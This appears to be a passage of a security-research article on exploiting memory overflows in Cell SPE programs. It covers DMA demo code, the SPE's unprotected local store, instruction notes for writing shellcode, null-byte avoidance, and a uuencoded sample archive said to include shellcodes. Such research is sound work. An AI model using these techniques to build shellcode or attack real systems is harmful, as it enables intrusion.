+	  one-sender-to-one-receiver signalling or
+	  many-senders-to-one-receiver signalling.
+
+All three are controlled and implemented by the SPE MFC and it's
+importance is related to the way the vulnerable program will receive it's
+input.
+
+---[ 2.4.4 - Memory Flow Control (MFC) Commands
+
+This is the main mechanism for the SPE to access the main storage and
+maintain syncronization with other processors and devices in the system.
+
+MFC commands can be issued either by the SPE itself, or by the processor
+and other devices, as follow:
+	- A code running on the SPU issue a MFC command by executing a
+	  series of writes and/or reads using channel instructions.
+	- A code running on the PPU or any other device issue a MFC
+	  command by performing a serie of stores and/or loads to
+	  memory-mapped I/O (MMIO) registers in the MFC.
+
+The MFC commands are then queued in one of those independent queues:
+	- MFC SPU Command Queue - For channel-initiated commands by the
+	  associated SPU
+	- MFC Proxy Command Queue - For MMIO-initiated commands by the PPE
+	  or other devices.
+
+
+---[ 2.4.5 - Direct Memory Access (DMA) Commands
+
+The MFC commands that transfers data are referred as DMA commands. The
+transfer direction for DMA commands are based on the SPE point of view:
+	- Into a SPE (from main storage to the local storage)   -> get
+	- Out of a SPE (from local storage to the main storage) -> put
+
+---[ 2.4.5.1 - Get/Put Commands
+
+DMA get from the main memory to the local storage:
+	(void) mfc_get (volatile void *ls, uint64_t ea, uint32_t size,
+			uint32_t tag, uint32_t tid, uint32_t rid)
+
+DMA put into the main memory from the local storage:
+	(void) mfc_put (volatile void *ls, uint64_t ea, uint32_t size,
+			uint32_t tag, uint32_t tid, uint32_t rid)
+
+To guarantee the synchronization of the writes to the main memory, there
+is the options:
+	- mfc_putf: the 'f' means fenced, or, that all commands executed
+	  before within the same tag group must finish first, later ones
+	  could be before
+
+	- mfc_putb: the 'b' here means barrier, or, that the barrier
+	  command and all commands issued thereafter are NOT executed
+	  until all previously issued commands in the same tag group have
+	  been performed
+	
+
+---[ 2.4.5.2 - Resources
+
+For DMA operations the system uses DMA transfers with variable length
+sizes (1, 2, 4, 8 and n*16 bytes (n an integer, of course).  There is a
+maximum of 16 KB per DMA transfer and 128b aligments offer better
+performance.
+
+The DMA queues are defined per SPU, with 16-element queue for
+SPU-initiated requests and 8-element queue for PPU-initiated requests.
+The SPU-initiated request has always a higher priority.
+
+To differentiate each DMA command, they receive a tag, with a 5-bit
+identifier.  Same identifier can be applied to multiple commands since
+it's used for polling status or waiting on the completion of the DMA
+commands.
+
+A great feature provided is the DMA lists, where a single DMA command can
+cause execution of a list of transfers requests (in local storage).  Lists
+implements scatter-gather functions and may contain up to 2K transfer
+requests.
+
+---[ 2.4.5.3 - SPE 2 SPE Communication
+
+An address in another SPE local storage is represented as a 32-bit
+effective address (global address).
+
+SPE issuing a DMA command needs a pointer to the other SPE's local
+storage.  The PPE code can obtain effective address of an SPE's local
+storage:
+
+---   code   ---
+#include <libspe.h>
+
+speid_t speid;
+void *spe_ls_addr;
+spe_ls_addr=spe_get_ls(speid);
+--- end code ---
+
+This permits the PPE to give to the SPEs each other local addresses and
+control the communications.  Vulnerabilities may arise don't matter what
+is the communication flow, even without involving the PPE itself.
+
+Follow is a simple DMA demo program between PPE and SPE (see the attached
+file for the complete version) - This program will send an address in the
+PPE to the SPE through DMA:
+
+--- PPE code ---
+information_sent	is[1] __attribute__ ((aligned 128)));	
+spe_git_t		gid;
+int * pointer=(int *)malloc(128);
+
+gid=spe_create_group(SCHED_OTHER, 0, 1);
+
+if (spe_group_max(gid) < 1 ) {
+	printf("\nOps, there is no free SPE to run it...\n");
+	exit(EXIT_FAILURE);
+}
+
+is[0].addr = (unsigned int) pointer;
+
+/* Create the SPE thread */
+speid=spe_create_thread (gid, &hello_dma, (unsigned long long *) &is[0], NULL, -1, 0);
+
+/* Wait for the SPE to complete */
+spe_wait(speids[0], &status[0], 0);
+
+/* Best pratice:  Issue a sync before ending - This is good for us ;) */
+__asm__ __volatile__ ("sync" : : : "memory");
+--- end code ---
+
+
+--- SPE code ---
+information_sent	is __attribute__ ((aligned 128)));	
+
+int main(unsigned long long speid, unsigned long long argp, unsigned long long envp)
+{
+	/* Where:
+		is   ->  Address in local storage to place the data
+		argp ->  Main memory address
+		sizeof(is) -> Number of bytes to read
+		31   ->  Associated tag to this DMA (from 0 to 31)
+		0    ->  Not useful here (just when using caching)
+		0    ->  Not useful here (just when using caching)
+	*/
+	mfc_get(&is, argp, sizeof(is), 31, 0, 0);
+
+	mfc_write_tag_mask(1<<31); /* Always 1 left-shifted the value of your tag mask */
+
+	/* Issue the DMA and wait until completion */
+	mfc_read_tag_status_all();
+}
+--- end code ---
+
+And now between two SPEs (also for the complete code, please refer to the 
+attached sources):
+
+--- PPE code ---
+speid_t speid[2]
+speid[0]=spe_create_thread (0, &dma_spe1, NULL, NULL, -1, 0);
+speid[1]=spe_create_thread (0, &dma_spe2, NULL, NULL, -1, 0);
+
+for (i=0; i<2; i++) local_store[i]=spe_get_ls(speid[i]); /* Get local storage address */
+
+for (i=0; i<2; i++) spe_kill(speid[i], SIGKILL); /* Send SIGKILL to the SPE 
+threds */
+--- end code ---
+
+--- SPE code ---
+/* Write something to the PPE */
+spu_write_out_mbox(buffer);
+
+/* Read something from the PPE */
+pointer = spu_read_in_mbox();
+
+/* DMA interface */
+mfc_get(buffer, pointer, size, tag, 0, 0);
+wait_on_mask(1<<tag);
+
+/* DMA something to the second SPE */
+mfc_put(buffer, local_store[1], size, tag, 0, 0);
+wait_on_mask(1<<tag);
+
+/* Notify the PPE */
+spu_write_out_mbox(1);
+--- end code ---
+
+------[ 3 - Exploiting Software Vulnerabilities on Cell SPE
+
+I love the architecture manuals and the engineers and the way they talk
+about really dumb design choices:
+
+"The SPU Local Store has no memory protection, and memory access wraps
+from the end of the Local Store back to the beginning.  An SPU program is
+free to write anywhere in the Local Store including its own instruction
+space.  A common problem in SPU programming is the corruption of the SPU
+program text when the stack area overflows into the program area.  This
+problem typically does not become apparent until some later point in the
+program execution when the program attempts to execute code in area that
+was corrupted, which typically results in illegal instruction exception.
+Even with a debugger it can be difficult to track down this type of
+problem because the cause and effect can occur far apart in the program
+execution.  Adding printf's just moves failure point around".
+
+---[ 3.1 - Memory Overflows
+
+In the aforementioned memory design of the SPU is already cleaver that
+when an attacker controls the overwrite size it's really easy to exploit a
+SPU vulnerability, just replacing the original program .text with the
+attacker's one.
+
+It's important to note that the SPU interrupt facility can be configured
+to branch to an interrupt handler at address 0 if an external condition is
+true (bisled - branch indirect and set link if external data is the
+instruction used to check if there is external data available).  Since the
+memory layout loops around, it's always possible to overwrite this handler
+if it's been used.
+
+Another important note is the fact that instructions on memory MUST be
+aligned on word boundaries.
+
+There is instruction and data caches for the local storage (depending on
+the implementation details), so it's important to assure:
+	- You are overflowing a large enough amount of data to avoid
+	  caching
+	- You are not using a self-modifying shellcode unless you issue
+	  the sync instruction (see [13] for references)
+
+
+---[ 3.1.1 - SPE memory layout
+
+The memory layout for the SPE looks like:
+
+	------------------------  -> 0x3FFFF
+	 SPU ABI Reserved Usage
+	------------------------			| Stack grows from the
+	     Runtime Stack				| higher addresses to 
+	------------------------			| the lower addresses.
+	       Global Data				| 
+	------------------------		        \/
+		 .Text
+	------------------------  -> 0x00000
+
+For the purpose of test your application, it's really interesting to use the
+'size' application:
+
+---------- begin output ----------
+	# size hello_spu
+	text	data	bss	dec	hex	filename
+	1346	928	32	2306	902	hello_spu
+---------- end   output ----------
+
+
+
+---[ 3.1.2 - SPE assembly basics
+
+It's important in order to develop a shellcode to understand the
+differences in the SPE assembly when comparing to PowerPC.
+
+The SPE uses risc-based assembly, which means there is a small set of 
+instructions and everything in the SPE runs in user-mode (there is no 
+kernel-mode for the SPE).  That said we need to remember there is no 
+system-calls, but instead there is the PPE calls (stop instructions).
+
+It is also a big endian architecture (keep that in mind while reading the
+following sections).
+
+This architecture provides many ways to avoid branches in the code for
+maximum efficiency.  Since it's not a real problem while exploiting
+software, I'll just avoid to talk about and will also avoid to talk about
+SIMD instructions.  For more informations on that refer to the SPU
+Instruction Set Architecture document [12].
+
+
+---[ 3.1.2.1 - Registers
+
+I already explained a little about the way the architecture works and in
+this section I'll just include what is the available register set and how
+to use it .
+
+The SPE does not define a conditional register, so the comparison
+operations will set results that are either 0 (false) or 1 (true) with the
+same width as the operands been tested.  This results are used to do
+bitwise masking, instruction selection or conditional branching.
+
+As any other platform, there is general purposes registers and special
+purpose registers in the SPE:
+	- General Purpose Registers (0-127) Used in different ways by the
+	  instructions.  In the second word of R1 you have the information
+	  about the amount of free space in the stack (the room between
+	  end of the heap and the start of the stack).
+
+	- Special Purpose Registers
+	The SPE also supports 128 special-purpose registers.  Some
+	interesting ones:
+		* SRR0 - Save and Restore Register 0 - Holds the address 
+		  used by the interrupt return (iret) instruction
+		* LR - Link Register - All branch instructions that set 
+		  the link register will force the address of the next
+		  instruction to be loaded on this register
+		* CTR - Count Register - Usually it's used to hold a loop
+                  counter (like the loop instruction and %ecx register in
+		  intel x86 architecture)
+		* CR - Condition Register - Used to perform conditional
+	          comparisons 
+
+
+To move data between Special Purpose Registers and General Purpose
+Registers we have the instructions
+	* mtspr (move to special purpose register) mfspr (move from
+	* special purpose register)
+
+
+---[ 3.1.2.2 - Local Storage Addressing Mode 
+
+In order to address information to/from Local Storage the instructions 
+uses the following structure:
+	Instruction_Opcode  l10_field	RA_field 	RT_field
+		8-bit	    10-bit	  7-bit		  7-bit
+
+Where: The signed value of the l10 field is appended with 4 zeros and then
+added to the preferred slot in the RA, forcing the 4-rightmost bits of the
+sum to zero.  After, the 16 bytes of the local storage address are
+inserted in the RT field. 
+
+	Preferred slot for the architecture point of view are the leftmost
+	4 bytes (not bits).
+
+Important to note here that the IBM convention specifies that:
+	l10 means a 10-bit immediate value
+	RA means a general purpose register to be used as 
+	   source/destination
+	RT means a general purpose register to be used as destination
+	   (target)
+
+Knowing that makes it easier to understand why the Local Storage Address
+Space is limited to 4 GB.
+
+The actual size of the Local Storage can be viewed accessing the LSLR
+(local storage limit register).  All effective address are ANDed with the
+value in the LSLR before used.
+
+---[ 3.1.2.3 - External Devices
+
+The SPU can send/receive data to/from external devices using the channel
+interface.  The channel instructions uses quadwords (128bits) to transfer
+data to/from general purpose registers and the channel device (which
+supports 128 channels).
+
+
+---[ 3.1.2.4 - Instruction Set 
+
+Here are some useful instructions to be used while developing a shellcode
+for the SPE.
+
+Instruction		Operands		Description		
+        Sample
+-------------------------------------------------------------------------
+lqd (load quadword)	rt,symbol(ra)		load a value (16 bytes)
+from Local Storage (pointed by RA to the general purpose register RT)
+	lqd $0, 16($1)
+
+stqd (store quadword)	rt,symbol(ra)		the contents of the
+register (RT) are stored at the local storage address pointed by RA
+	stqd	$0, 16($1)
+
+ilh (immediate load halfword) rt,symbol		the value of l16 is placed
+in register RT
+	ilh $0, 0x1a0
+
+il (immediate load word) rt, symbol		the value of l16 is
+expanded to 32bits replicating the leftmost bit and then written to the RT
+	il $0, 0x1a0
+
+nop (no operation)	rt			this instruction uses a
+false RT and nothing is changed
+	nop $127
+
+ila (immediate load address) rt, symbol		the value of the l18 is
+placed in the rightmost 18bits of RT (the remaining bits of RT are zeroed)
+	ila $3, 0x340
+
+a (add word)		rt,ra,rb		the operand on register ra
+is added to the operand on register rb and the result is written to RT
+	a $0, $1, $2
+
+ai (add word immediate)	rt,ra,value		the value (l10 field) is
+added to the operand in ra and the result written to RT
+	ai $1, $1, -32
+
+brsl (branch relative and set link) rt,symbol	execution proceeds to the
+target instruction and a link register is set (the symbol is a l16 type
+and it is extended to the rigth with two 0 bits) - The address of the
+current instruction is added to the symbol address for the branch.  The
+address of the next instruction is written to the preferred byte of the RT
+register.
+        brsl $0, 0x1a0
+
+fsmbi (form select mask for bytes immediate) rt,symbol	the symbol is a
+l16 value used to create a mask in the register RT copying eight times
+each bit.  Bits in the operand are related to bytes in the result in a
+left-to-right correspondence.  fsmbi $3, 0
+
+bi (branch indirect)	ra			execution proceeds to the
+preferred slot of RA.  The right two bits in the RA are ignored (supposed
+to be zero).  There is two flags, D and E to disable and Enable
+interrupts.
+	bi $0
+
+
+
+---[ 3.1.3 - Exploiting Software Vulnerabilities in SPE
+
+First of all it's important to make it even more clear that it is
+impossible to, for example, force the SPE process to execute a new command
+(a.k.a. execve() shellcodes).  The same happens for network-based library
+functions and others, as already explained we need the PPE to proxy that
+for us.
+
+So it open two new paths:
+	- Create a PPE shellcode to be used while exploiting PPE software
+	  vulnerabilities that will spawn a proxy for commands received by
+	  the SPE and will create a SPE thread to do all the job -> This
+	  is pure PPC shellcode and this article already discussed
+	  everything needed to achieve that.  In the attached sources you
+	  have samples in the directory cell-ppe/ [16].
+	- Create a vulnerability specific code for the SPE, that will
+	  print out internal program information related to the exploited
+	  SPE.  This is specially interesting and difficult because:
+		* Need to remember that the SPE uses instruction-cache, so
+                  sometimes if you overflow just a small amount of bytes, 
+		  it will be specially difficult to get it executed
+		* If you use the wrap-around characteristics of the memory
+                  layout for the SPE, you will probably overwrite also the
+		  information you are interested in.
+
+In the other hand, it's important to say that everything the information
+will be in the same place (or easier to understand:  there is no ASLR in
+the SPE).  Running the attached samples (specially the SPE-SPE
+communications because it's printing the pointers addresses will make it
+clear to the reader).
+
+
+---[ 3.1.3.1 - Avoiding Null Bytes
+
+It is important to avoid null bytes, so we cannot use the NOP instruction
+in our shellcode.
+
+This creates a problem, since the ori instruction will also generate null
+byte if used with 0 as an argument (e.g: ori $1, $1, 0).
+
+A good replacement is the instruction or (e.g: or $1, $1, $1) or the usage
+of multiple instructions (which will reduce the probability of your return
+address).
+
+
+---[ 3.1.4 - Finding software vulnerabilities on SPE
+
+The simulator provided by IBM has a feature that monitors selected
+addresses or regions on the Local Store for read and write accesses.  This
+feature can help identify stack overflows conditions.o
+
+Invoked from the simulator command windows as follows:
+	enable_stack_checking [spu_number] [spu_executable_filename]
+
+This procedure uses the nm system utility to determine the area of the
+Local Storage that will contain the program code and creates trigger
+functions to trap writes by the SPU into this region.
+
+Important to notice that this approach are just looking for writes in the
+text and static data and not to the heap.  Of course the same approach
+used by this feature could be used to help the creation of a fuzzer using
+TCL scripts based on the one provided.
+
+------[ 4 - Future and other uses
+
+I can't foresee the future, but this kind of architectures are becoming
+more and more common and will open a wide range of new vulnerabilities.
+
+The complexity behind this kind of asymmetric multi-threaded architectures
+are even higher than the normal ones.  The lack of memory protection will
+help also the attackers on how to subvert those systems.  The main
+processor been based on an already well-known architecture (powerpc) also
+helps the dissemination of malicious codes.
+
+Many other researchers are doing stuff using Cell:
+	- Nick Breese presented on Crackstation project in BlackHat [5]
+	  Basically he used the SIMD capabilities and big registers
+	  provided by the architecture to crack passwords [5]
+
+	- IBM Researchers released a study about the usage of the Cell SPU
+	  as a Garbage Collector Co-processor [14]
+
+	- Maybe there is JTAG-based interfaces on the cell machines to try
+	  to use RiscWatch [15]
+
+	- Unfortunelly the SPU access are controlled by the PPE so run
+	  integrity protection mechanisms from SPU seens infeasible ->
+	  Anyway, I wrote a network traffic analyzer using cell as base
+	  architechture.
+
+
+
+------[ 5 - Acknowledgments
+
+A lot of people helped me in the long way for these researches that
+resulted in something funny to be published, you all know who you are.
+
+Special thanks to the Phrack Staff for the great review of the article,
+giving a lot of important insights about how to better structure it and
+giving a real value to it.
+
+I always need to thanks to Filipe Balestra, my research partner, for
+sharing with me his ideas, feedbacks, comments and experiences improving a
+lot the article and the samples.
+
+I'll never ever forget to say thanks to my research team and friends at
+RISE Security (http://www.risesecurity.org) for always keeping me
+motivated studying completely new things.   Be sure that the unix-asm [16]
+project will be updated soon with all the stuff showed here and much more
+different types of shellcodes for the architecture.  Also, of course the
+updates will be available for Metasploit.
+
+Big thanks to the Cell Kernel guru, Andre Detsch for sharing with me his
+ideas and discussing the internals of the Linux implementation for Cell.
+
+Conference organizers who invited me to talk about Cell Software
+Exploitation, even after many people already talked about Cell they
+trusted that my talk was not about brute-forcing (yeah, a lot of fun in
+completely different cultures).
+
+To my girlfriend who waited for me (alone, I suppose) during this travels.
+
+It's impossible to not say thanks to COSEINC, for let me keep doing this
+research using important company time.
+
+------[ 6 - References
+
+[1] Cell Broadband Engine Architecture, v1.01 October 2006
+http://cell.scei.co.jp/pdf/CBE_Architecture_v101.pdf
+
+[2] Sony Computer Entertainment
+http://www.sony.com
+
+[3] Toshiba Corporation
+http://www.toshiba.com
+
+[4] IBM Corporation
+http://www.ibm.com
+
+[5] Breese, Nick; "Crackstation"; Black Hat Europe 2008 
+http://www.blackhat.com/presentations/bh-europe08/Bresse/Presentation/bh-eu-08-breese.pdf
+
+[6] IBM Power Architecture
+http://www-03.ibm.com/chips/power/
+
+[7] IBM Bladecenter QS21
+http://www.ibm.com/systems/bladecenter/hardware/servers/qs21/index.html
+
+[8] IBM Roadrunner Supercomputer
+http://en.wikipedia.org/wiki/IBM_Roadrunner
+
+[9] The cell project at IBM Research
+http://www.research.ibm.com/cell/
+
+[10] Cell Simulator
+http://www.alphaworks.ibm.com/tech/cellsystemsim
+
+[11] Cell resource center at developerWorks (SDK download)
+http://www-128.ibm.com/developerworks/power/cell/
+
+[12] Synergistic Processor Unit Instruction Set Architecture v1.2
+http://www-01.ibm.com/chips/techlib/techlib.nsf/techdocs/76CA6C7304210F3987257060006F2C44/$file/SPU_ISA_v1.2_27Jan2007_pub.pdf
+
+[13] Moore, H.D; "Mac OS X PPC Shellcode Tricks"; Uninformed Magazine 2005
+http://www.uninformed.org/?v=1&a=1&t=txt
+
+[14] Cher, Chen-Yong; Gschwind, Michael; "Cell GC: Using the Cell Synergistic Processor as a Garbage Collector Coprocessor"; 2008
+http://www.research.ibm.com/cell/papers/2008_vee_cellgc_slides.pdf
+
+[15] RISCWatch Debugger
+http://www.ibm.com/chips/techlib/techlib.nsf/products/RISCWatch_Debugger
+
+[16] Carvalho, Ramon de; "Cell PPE Shellcodes"; RISE Security;
+http://www.risesecurity.org/papers/lopbuffer.pdf
+
+
+Others:
+
+PowerPC User Instruction Set Architecture, Book I, v2.02 January 2005
+http://moss.csc.ncsu.edu/~mueller/cluster/ps3/SDK3.0/docs/arch/PPC_Vers202_Book1_public.pdf
+
+PowerPC Virtual Environment Architecture, Book II, v2.02 January 2005
+http://moss.csc.ncsu.edu/~mueller/cluster/ps3/SDK3.0/docs/arch/PPC_Vers202_Book2_public.pdf
+
+PowerPC Operating Environment Architecture, Book III, v2.02 January 2005
+http://moss.csc.ncsu.edu/~mueller/cluster/ps3/SDK3.0/docs/arch/PPC_Vers202_Book3_public.pdf
+
+Cell developer's corner at power.org
+http://www.power.org/resources/devcorner/cellcorner/
+
+Linux info at the Barcelona Supercomputing Center website
+http://www.bsc.es/projects/deepcomputing/linuxoncell
+
+
+------[ 7 - Notes on SDK/Simulator Environment
+
+There is some pictures on the simulator and sdk running on the attached file:
+	images/cell-sim1.jpg and images/cell-sim2.jpg
+
+To install the SDK/Simulator, do:
+	- Download the Cell SDK ISO image from the IBM alphaWorks website. 
+	- Mount the disk image on the mount directory: mount -o loop
+	  CellSDK<version>.iso /mnt/phrack
+	- Change directory to /mnt/phrack/software:
+	- Install the SDK by using the following command and answer any
+	  prompts: ./cellsdk install
+	
+To start the simulator: cd /opt/IBM/systemsim-cell/run/cell/linux
+../run_gui Click on the 'go' button to start the simulated system	
+
+To copy files to the simulated system (inside it run):
+	callthru source /home/bsdaemon/Phrack/hello_ppu > hello_ppu
+
+Then give the correct permissions and execute:
+	chmod +x hello_ppu
+	./hello_ppu
+
+
+
+------[ 8 - Sources [cell_samples.tgz]
+
+Attached all the samples used on this article to be compiled in a Linux
+running on Cell machine.
+
+Further updates will be available in the RISE Security website at:
+	http://www.risesecurity.org
+
+For the author's public key:
+	http://www.kernelhacking.com/rodrigo/docs/public.txt
+
+begin 644 cell_samples.tgz
+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
